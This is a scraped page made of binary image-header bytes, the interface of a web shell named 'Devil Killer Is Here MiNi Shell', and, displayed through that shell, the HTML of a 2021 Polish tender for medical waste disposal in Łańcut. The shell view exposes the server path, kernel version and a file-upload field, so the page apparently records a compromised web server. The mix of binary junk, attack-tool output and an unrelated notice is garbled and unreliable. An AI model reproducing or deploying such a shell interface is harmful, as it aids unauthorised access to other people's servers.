JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211125/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20211125/0028327501-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> WYKONANIE USŁUGI ODBIORU, TRANSPORTU I UNIESZKODLIWIANIA ODPADÓW MEDYCZNYCH Z „CENTRUM MEDYCZNEGO W ŁAŃCUCIE” SP. Z O. O. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">&#34;CENTRUM MEDYCZNE W ŁAŃCUCIE&#34; SPÓŁKA Z OGRANICZONĄ ODPOWIEDZIALNOŚCIĄ</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 180405906</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Ignacego Paderewskiego 5</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Łańcut</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">37-100</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podkarpackie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL823 - Rzeszowski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia2@cm-lancut.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://www.cm-lancut.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - osoba prawna, o której mowa w art. 4 pkt 3 ustawy (podmiot prawa publicznego)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Zdrowie</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> WYKONANIE USŁUGI ODBIORU, TRANSPORTU I UNIESZKODLIWIANIA ODPADÓW MEDYCZNYCH Z „CENTRUM MEDYCZNEGO W ŁAŃCUCIE” SP. Z O. O. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-ff76d48e-4dc0-11ec-8c2d-66c2f1230e9c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00283275</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-11-25</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://cm-lancut.ezamawiajacy.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://cm-lancut.ezamawiajacy.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Ogólne zasady korzystania z Platformy Zamawiającego, z zastrzeżeniem pkt 5;<br/>1. Zgłoszenie do postępowania wymaga zalogowania Wykonawcy do Systemu na subdomenie<br/>Szpitala: https://cm-lancut.ezamawiajacy.pl/ lub https://oneplace.marketplanet.pl.<br/>2. Zamawiający określa niezbędne wymagania sprzętowo – aplikacyjne umożliwiające pracę<br/>na Platformie eZamawiający, tj.:<br/>a) Stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s;<br/>b) Komputer klasy PC lub MAC, o następującej konfiguracji: pamięć min 2GB Ram, procesor Intel IV<br/>2GHZ, jeden z systemów operacyjnych – MS Windows 7 , Mac Os x 10.4, Linux, lub ich nowsze<br/>wersje;<br/>c) Zainstalowana dowolna przeglądarka internetowa obsługująca TLS 1.2, najlepiej w najnowszej<br/>wersji w przypadku Internet Explorer minimalnie wersja 10.0;<br/>d) Włączona obsługa JavaScript;<br/>e) Zainstalowany program Acrobat Reader lub inny obsługujący pliki w formacie .pdf.<br/>3. Zamawiający określa niezbędne wymagania sprzętowo – aplikacyjne umożliwiające prawidłowe<br/>złożenie kwalifikowanego podpisu elektronicznego:<br/>a) Rekomendowaną przeglądarką do złożenia oferty jest MS Internet Explorer lub Firefox w wersji<br/>wpieranej przez producenta.<br/>b) Uruchomienie oprogramowania do składania podpisu wymaga również zainstalowania Java w wersji<br/>1.8.0_65 lub nowszej, koniecznie w wersji 32 - bitowej, pozwalające na przyjmowanie przez<br/>użytkownika sesyjnych plików cookie oraz obsługującej szyfrowanie. Konieczne jest również dodanie<br/>adresu witryny platformy eZamawiający (ezamawiający.pl) do wyjątków (exception site list) w Javie.<br/>Uwaga: wymaga to uprawnień administracyjnych na komputerze.<br/>c) Zainstaluj dedykowany komponent Szafir SDK oraz aplikację Szafir Host, który odpowiada za<br/>obsługę funkcjonalności podpisu elektronicznego w platformie eZamawiający. Rozszerzenie Szafir<br/>SDK można pobrać tutaj. Po zainstalowaniu rozszerzenia Szafir SDK oraz aplikacji Szafir Host należy przeładować bieżącą stronę.<br/>d) Przed uruchomieniem platformy eZamawiający, w pierwszej kolejności podłącz czytnik z kartą<br/>kryptograficzną do komputera.<br/>4. Informacje dotyczące odpowiedniego przygotowania stanowiska znajdują się na stronie:<br/>https://oneplace.marketplanet.pl/przygotuj-stanowisko-pc-wykonujac-ponizsze-kroki.<br/>5. Zamawiający zgodnie z § 3 ust. 3 ww. Rozporządzenia, określa dopuszczalne formaty przesyłanych danych, tj. plików o wielkości do 100 MB w txt, rtf, pdf ,xps, odt, ods, odp, doc, xls, ppt, docx, xlsx, pptx,<br/>csv, jpg, jpeg, tif, tiff, geotiff, png, svg, wav, mp3, avi, mpg, mpeg, mp4, m4a, mpeg4, ogg, ogv, zip, tar,<br/>gz, gzip, 7z, html, xhtml, css, xml, xsd, gml, rng, xsl, xslt, TSL, XMLsig, XAdES, CAdES, ASIC,<br/>XMLenc.<br/>Zamawiający określa informacje na temat kodowania i czasu odbioru danych, tj.: plik załączony przez<br/>Wykonawcę na Platformie eZamawiający i zapisany, widoczny jest w Systemie, jako zaszyfrowany –<br/>format kodowania UTF8. Możliwość otworzenia pliku dostępna jest dopiero po odszyfrowaniu przez<br/>Zamawiającego po upływie terminu otwarcia ofert.<br/>6.Oznaczenie czasu odbioru danych przez Platformę stanowi datę oraz dokładny czas (hh:mm:ss)<br/>generowany wg czasu lokalnego serwera synchronizowanego odpowiednim źródłem czasu.<br/>11. Korzystanie z Platformy jest bezpłatne.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z<br/>04.05.2016, str. 1), dalej<br/>„RODO”, informuję, że:<br/>• administratorem Pani/Pana danych osobowych jest „Centrum Medyczne w Łańcucie” Sp. z o. o., ul.<br/>Paderewskiego 5, 37 – 100 Łańcut;<br/>• kontakt z Inspektorem Ochrony Danych Osobowych jest: za pośrednictwem poczty elektronicznej na<br/>adres: iod@cm-lancut.pl, telefonicznie – nr telefonu (17) 22 40 802 lub listownie na adres „Centrum<br/>Medyczne w Łańcucie” Sp. z o. o., ul. Paderewskiego 5, 37 – 100 Łańcut (sekretariat) lub kontakt<br/>osobisty w siedzibie Zamawiającego;<br/>• Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu<br/>związanym z postępowaniem o udzielenie zamówienia publicznego p. n. „WYKONANIE USŁUGI<br/>ODBIORU, TRANSPORTU I UNIESZKODLIWIANIA ODPADÓW MEDYCZNYCH Z „CENTRUM<br/>MEDYCZNEGO W ŁAŃCUCIE” SP. Z O. O.”, Znak sprawy: SZP/380/22/2021;;<br/>• odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie<br/>dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ust. 1 ustawy z dnia 11 września 2019 r. –<br/>Prawo zamówień publicznych (Dz. U. z 2019 r. poz. 2019 z późn. zm.), dalej „ustawa Pzp”;<br/>• Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp, przez okres<br/>4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy<br/>przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>• obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest<br/>wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem<br/>w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych<br/>wynikają z ustawy Pzp;<br/>• w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób<br/>zautomatyzowany, stosowanie do art. 22 RODO;<br/>• posiada Pani/Pan:<br/>− na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>− na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych **;<br/>− na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych<br/>osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO ***;<br/>− prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że<br/>przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>• nie przysługuje Pani/Panu:<br/>− w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>− prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>− na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż<br/>podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO;<br/>− przysługuje Pani/Panu prawo wniesienia skargi do organu nadzorczego na niezgodne z RODO<br/>przetwarzanie Pani/Pana danych osobowych przez administratora. Organem właściwym dla<br/>przewidzianej skargi jest Urząd Ochrony Danych Osobowych, ul. Stawki2, 00 – 193 Warszawa.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Nie dotyczy</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">SZP/380/22/2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.5.) Łączna wartość poszczególnych części zamówienia: <span class="normal"> 896515,00 PLN </span> </h3> <h3 class="mb-0">4.1.6.) Wartość zamówienia stanowiącego przedmiot tego postępowania (bez VAT): <span class="normal"> 209991,10 EUR </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">3</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> PAKIET i - ODPADY MEDYCZNE NR 1 </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 720650,00 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90524000-6 - Usługi w zakresie odpadów medycznych</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">90524200-8 - Usługi usuwania odpadów szpitalnych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">80</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres niezmienności cen</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> PAKIET II - ODPADY MEDYCZNE NR 2 </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 175440,00 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90524000-6 - Usługi w zakresie odpadów medycznych</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">90524200-8 - Usługi usuwania odpadów szpitalnych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">80</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres niezmienności cen</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> PAKIET III - ODPADY POZOSTAŁE </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 425,00 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90524000-6 - Usługi w zakresie odpadów medycznych</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">80</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres niezmienności cen</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Warunki udziału w postępowaniu oraz sposób dokonywania oceny spełniania tych warunków:<br/>O udzielenie zamówienia mogą ubiegać się Wykonawcy , którzy spełniają warunki określone w<br/>art. 273 ust. 1 Ustawy Pzp, tj.:<br/>1. nie podlegają wykluczeniu;<br/>2. spełniają warunki udziału w postępowaniu, dotyczące:<br/>1) zdolności do występowania w obrocie gospodarczym – Zamawiający nie stawia<br/>szczegółowego warunku w tym zakresie,<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika<br/>to z odrębnych przepisów – Zamawiający wymaga:<br/>a) W celu potwierdzenia spełniania warunków udziału w postępowaniu zezwolenia uprawniające<br/>Wykonawcę do prowadzenia działalności w zakresie transportu i przetwarzania odpadów,<br/>zgodnie z wymaganiami ustawy z dnia 14 grudnia 2012 r. o odpadach (tj. Dz. U. z 2021 r., poz.<br/>779 ze zm.) aktualne zezwolenie (Decyzje) wydane przez właściwy organ administracji<br/>publicznej na transport odpadów objętych przedmiotem zamówienia oraz aktualne zezwolenie<br/>(Decyzje) wydane przez właściwy organ administracji publicznej na przetwarzanie odpadów<br/>będących przedmiotem zamówienia, w tym unieszkodliwianie zakaźnych odpadów medycznych<br/>przez termiczne przekształcanie w spalarni odpadów niebezpiecznych lub aktualne zezwolenie (Decyzje) wydane przez właściwy organ administracji publicznej na przetwarzanie odpadów<br/>będących przedmiotem zamówienia, w tym unieszkodliwianie zakaźnych odpadów medycznych<br/>przez termiczne przekształcanie w spalarni odpadów niebezpiecznych oraz wpis do rejestru októrym mowa w art. 49 ustawy z dnia 14 grudnia 2012 r. o odpadach (TJ. Dz. U. z 2021 r., poz. 779<br/>ze zm.), z tym, że w zakresie kodów 060404*, 160214, 160216, 160604, 160213*<br/>wystarczającym jest posiadanie zezwolenia na prowadzenie działalności w zakresie zbierania itransportu odpadów.<br/>3) sytuacji ekonomicznej lub finansowej – Zamawiający nie stawia szczegółowego warunku w tym zakresie,<br/>4) zdolności technicznej lub zawodowej – Zamawiający nie stawia szczegółowego warunku w tym zakresie. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1.W postępowaniu mogą wziąć udział Wykonawcy, którzy nie podlegają wykluczeniu<br/>z postępowania na podstawie art. 108 ust. 1 Ustawy – Prawo zamówień publicznych.<br/>2.Wykluczenie Wykonawcy następuje zgodnie z art. 111 Ustawy.<br/>Podmiotowe środki dowodowe i wykaz oświadczeń lub dokumentów, jakie mają dostarczyć<br/>Wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu oraz podstaw<br/>wykluczenia:<br/>Do oferty Wykonawca zobowiązany jest dołączyć aktualne na dzień składania ofert, następujące<br/>oświadczenia:<br/>1. W zakresie wykazania spełniania przez Wykonawcę warunków, o których mowa w art. 273 Ustawy<br/>Prawo zamówień publicznych, Wykonawca zobowiązany jest przedłożyć oświadczenie o spełnianiu<br/>warunków udziału w postępowaniu – wypełnione i podpisane odpowiednio przez osobę (osoby)<br/>upoważnioną (upoważnione) do reprezentowania Wykonawcy. 